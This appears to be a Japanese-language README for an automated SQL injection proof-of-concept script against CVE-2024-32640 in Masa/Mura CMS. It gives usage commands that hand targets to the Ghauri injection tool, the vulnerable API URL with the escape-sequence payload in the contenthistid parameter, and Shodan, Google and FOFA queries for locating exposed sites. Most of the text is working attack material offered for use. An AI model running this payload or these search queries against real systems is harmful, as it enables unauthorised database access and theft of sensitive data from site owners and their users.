
CVE-2024-32640 | 自動化されたSQLiエクスプロイトPoC
python3 CVE-2024-32640.py --url https://target.com/
Ghauri で使用したい任意の引数を、その引数リストに従って渡します:
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

ツールに実装した検出機能を使用することで、脆弱なターゲットを Ghauri で悪用できるようになります。このスクリプトは、必要なターゲット情報をすべて Ghauri への呼び出しに解析して渡すことで、このプロセスを自動化します。

contenthisid HTML クエリパラメータ値にエスケープシーケンス (%5c) を追加することで、ターゲットがこの SQLi に対して脆弱かどうかを検証できます。
悪用に成功すると、機密データへの不正アクセスにつながる可能性があります。
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Shodan クエリ: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
https://twitter.com/HunterMapping/status/1790620695371911388